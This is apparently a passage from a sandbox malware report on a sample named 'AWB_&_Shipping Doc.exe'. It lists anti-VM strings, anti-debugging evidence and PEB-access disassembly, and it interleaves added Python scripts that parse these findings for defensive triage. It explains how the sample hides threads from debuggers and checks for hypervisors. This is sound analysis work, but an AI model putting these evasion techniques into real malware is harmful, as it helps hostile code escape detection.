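The strings above are what the sandbox found in memory, not a verdict on what the sample does with them. The Hyper-V service descriptions and Host Compute Service error texts in explorer.exe (a process the sample injected into) are most likely Windows' own resource text that any process can have mapped, whereas the QEMU guest-agent path sits in the sample file itself and the vmic* service names appear in the sample's own process memory. The following is an added example, not code from the report or from Joe Security, that parses lines of this format, fingerprints the hypervisor each string points at, and weights each hit by where it was found. The regexes, the confidence heuristic and the sample lines are assumptions modelled on the entries above.

```python
"""Triage the "Binary or memory string" findings of a sandbox report for
hypervisor artifacts and weigh them by where the string was found.

Added example, not code from the Joe Sandbox report or from Joe Security. The
regexes, the confidence heuristic and the sample lines are assumptions built
from the strings listed in the report.
"""
import re
from collections import defaultdict

SAMPLE_NAME = "AWB_&_Shipping Doc.exe"

# Hypervisor fingerprints. Assumption: derived from the strings in the report;
# extend them for your own corpus.
ARTIFACT_PATTERNS = [
    ("VMware", re.compile(r"ven_vmware|necvmwar|prod_vmware|vmware sata", re.I)),
    ("Hyper-V", re.compile(r"\bvmic(?:shutdown|vss|heartbeat|timesync|kvp|rdv)\b", re.I)),
    ("Hyper-V", re.compile(r"\bHyper-V\b", re.I)),
    ("QEMU", re.compile(r"qemu-ga\.exe", re.I)),
]

# One report line: "Source: <process>[, <dump>]... Binary or memory string: <text>"
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*Binary or memory string:\s*(?P<text>.+?)\s*$"
)
DUMP_RE = re.compile(r"\.sdmp$", re.I)


def parse_line(line):
    """Split a finding into the processes, the memory dumps and the string.
    Returns None for lines that are not memory-string findings."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    tokens = [t.strip() for t in m.group("source").split(",")]
    return {
        "processes": [t for t in tokens if not DUMP_RE.search(t)],
        "dumps": [t for t in tokens if DUMP_RE.search(t)],
        "text": m.group("text"),
    }


def classify(text):
    """Hypervisors whose fingerprints occur in the string (sorted, de-duplicated)."""
    return sorted({label for label, rx in ARTIFACT_PATTERNS if rx.search(text)})


def confidence(finding, sample_name):
    """Heuristic weight for a hit (an assumption, not a Joe Sandbox scoring rule):
    high   - the string is embedded in the sample file itself (no dump listed)
    medium - the string appears in the sample's own process memory at runtime
    low    - the string appears only in a system process the sample injected
             into, where Hyper-V service descriptions and HCS error text are
             the OS's own resources rather than a check the sample performs."""
    if not finding["dumps"]:
        return "high"
    if sample_name.lower() in {p.lower() for p in finding["processes"]}:
        return "medium"
    return "low"


def triage(lines, sample_name):
    """Count hits per hypervisor and confidence level."""
    summary = defaultdict(lambda: {"high": 0, "medium": 0, "low": 0})
    for line in lines:
        finding = parse_line(line)
        if finding is None:
            continue
        level = confidence(finding, sample_name)
        for hv in classify(finding["text"]):
            summary[hv][level] += 1
    return {hv: dict(counts) for hv, counts in summary.items()}


# Constructed input: a handful of lines copied from the report plus one
# non-matching behaviour line as a control.
SAMPLE_LINES = [
    r"Source: explorer.exe, 00000003.00000000.274294793.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000",
    r"Source: AWB_&_Shipping Doc.exe, 00000000.00000002.235846059.000000000470A000.00000004.00000001.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service",
    r"Source: AWB_&_Shipping Doc.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe",
    r"Source: explorer.exe, 00000003.00000000.273517404.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.",
    r"Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297618677.00000000024DA000.00000004.00000001.sdmp Binary or memory string: vmicvss",
    r"Source: C:\Windows\explorer.exe Last function: Thread delayed",
]

if __name__ == "__main__":
    for hv, counts in sorted(triage(SAMPLE_LINES, SAMPLE_NAME).items()):
        print(f"{hv:8s} {counts}")
```

On the sample lines the only high-confidence hit is the QEMU guest-agent path, which is a static string in the binary; the Hyper-V hits split into the sample's own runtime memory (medium) and explorer.exe's mapped resources (low), and the VMware device IDs are seen only in explorer.exe. Treat the low bucket as context, not as evidence that the sample checks for that hypervisor.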

    Anti Debugging:

    Contains functionality to hide a thread from the debugger
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_00560427 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Process queried: DebugPort
    Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
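The NtSetInformationThread call above has the canonical shape of the thread-hiding trick: information class 0x11 is ThreadHideFromDebugger, passed with a NULL buffer and zero length, after which the kernel stops reporting that thread's debug events to an attached debugger. The DebugPort entries are NtQueryInformationProcess(ProcessDebugPort) queries, the same check CheckRemoteDebuggerPresent performs. The following added example, not code from the report or from Joe Security, parses both kinds of entry into named techniques and counts them per process. The information-class values are the documented NT constants; the line formats and the sample lines are assumptions modelled on the entries above.

```python
"""Decode the anti-debugging evidence of a sandbox report into named
techniques: NtSetInformationThread(ThreadHideFromDebugger) found in the code
and the HideFromDebugger / DebugPort behaviour observed at runtime.

Added example, not code from the Joe Sandbox report or from Joe Security. The
information-class values are the documented NT constants; the line formats and
the sample lines are assumptions modelled on the report.
"""
import re
from collections import Counter

# Documented NT information classes used for debugger evasion.
THREAD_INFO_CLASS = {0x11: "ThreadHideFromDebugger"}
PROCESS_INFO_CLASS = {
    0x07: "ProcessDebugPort",
    0x1E: "ProcessDebugObjectHandle",
    0x1F: "ProcessDebugFlags",
}
PROCESS_QUERY_TECHNIQUE = {
    0x07: "query-debug-port",
    0x1E: "query-debug-object-handle",
    0x1F: "query-debug-flags",
}

# Static evidence: "Code function: <id> <Api> <arg>,<arg>,..." with 8-digit hex
# arguments, or "?" where the disassembler could not resolve one.
CALL_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*Code function:\s*(?P<func>\w+)\s+(?P<api>(?:Nt|Zw)\w+)\s+"
    r"(?P<args>(?:[0-9A-Fa-f]{8}|\?)(?:,(?:[0-9A-Fa-f]{8}|\?))*)"
)
# Dynamic evidence: "Thread information set: HideFromDebugger" or
# "Process queried: DebugPort".
BEHAVIOUR_RE = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*(?P<kind>Thread information set|Process queried):\s*(?P<what>\w+)"
)
BEHAVIOUR_TECHNIQUE = {
    ("Thread information set", "HideFromDebugger"): "hide-thread-from-debugger",
    ("Process queried", "DebugPort"): "query-debug-port",
}


def decode_call(api, args):
    """Map a raw Nt*/Zw* call with integer arguments (None for unresolved ones)
    to (technique, detail); technique is None when the call is not a known
    anti-debugging shape."""
    if api.endswith("SetInformationThread") and len(args) >= 4 and None not in args[:4]:
        handle, cls, buf, length = args[:4]
        # Canonical trick: NtSetInformationThread(hThread, ThreadHideFromDebugger, NULL, 0)
        if cls == 0x11 and buf == 0 and length == 0:
            return "hide-thread-from-debugger", f"{THREAD_INFO_CLASS[cls]} on handle {handle:#x}"
        return None, f"{api} class {cls:#x}"
    if api.endswith("QueryInformationProcess") and len(args) >= 2 and args[1] is not None:
        cls = args[1]
        if cls in PROCESS_INFO_CLASS:
            return PROCESS_QUERY_TECHNIQUE[cls], PROCESS_INFO_CLASS[cls]
        return None, f"{api} class {cls:#x}"
    return None, api


def decode_line(line):
    """Return (process, technique, evidence, detail) for one report line, or
    None if the line is neither a code-function nor a behaviour entry.
    evidence is "static:<function id>" or "dynamic"."""
    m = CALL_RE.search(line)
    if m:
        args = [None if a == "?" else int(a, 16) for a in m.group("args").split(",")]
        technique, detail = decode_call(m.group("api"), args)
        return m.group("proc"), technique, "static:" + m.group("func"), detail
    m = BEHAVIOUR_RE.search(line)
    if m:
        technique = BEHAVIOUR_TECHNIQUE.get((m.group("kind"), m.group("what")))
        return m.group("proc"), technique, "dynamic", m.group("what")
    return None


def summarize(lines):
    """Count recognised techniques per process, split into static and dynamic evidence."""
    counts = Counter()
    for line in lines:
        decoded = decode_line(line)
        if decoded is None or decoded[1] is None:
            continue
        proc, technique, evidence, _ = decoded
        counts[(proc, technique, evidence.split(":")[0])] += 1
    return dict(counts)


# Constructed input modelled on the report's entries, plus one unrelated
# "Process information queried" line as a control.
SAMPLE_PROCESS = r"C:\Users\user\Desktop\AWB_&_Shipping Doc.exe"
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_00560427 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Process information queried: ProcessInformation",
]

if __name__ == "__main__":
    for key, n in sorted(summarize(SAMPLE_LINES).items()):
        print(n, key)
```

The hide-thread hit is low-noise, since ordinary applications have no reason to set that information class, whereas DebugPort queries also come from frameworks that call CheckRemoteDebuggerPresent. When stepping through the sample by hand, hook NtSetInformationThread (ScyllaHide does this) or change the class before it reaches the kernel; otherwise exceptions in the hidden thread, breakpoints included, are never reported to the debugger and the process usually dies on them.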
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E186DE6 rdtsc
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E18967A LdrInitializeThunk
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E178E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1FFE3F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E201608 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E14E620 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E15766D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E210EA5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1DFE87 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1C46A7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1736CC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1FFEC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E188EC7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E218ED6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1716E0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1576E2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16F716 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E1DFF10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E17A70E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E17A70E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E17E730 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16B73D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E16B73D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E21070D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E21070D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E144F2E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E144F2E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E218F6A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E15EF40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E15FF60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe Code function: 1_2_1E158794 mov eax, dword ptr fs:[00000030h]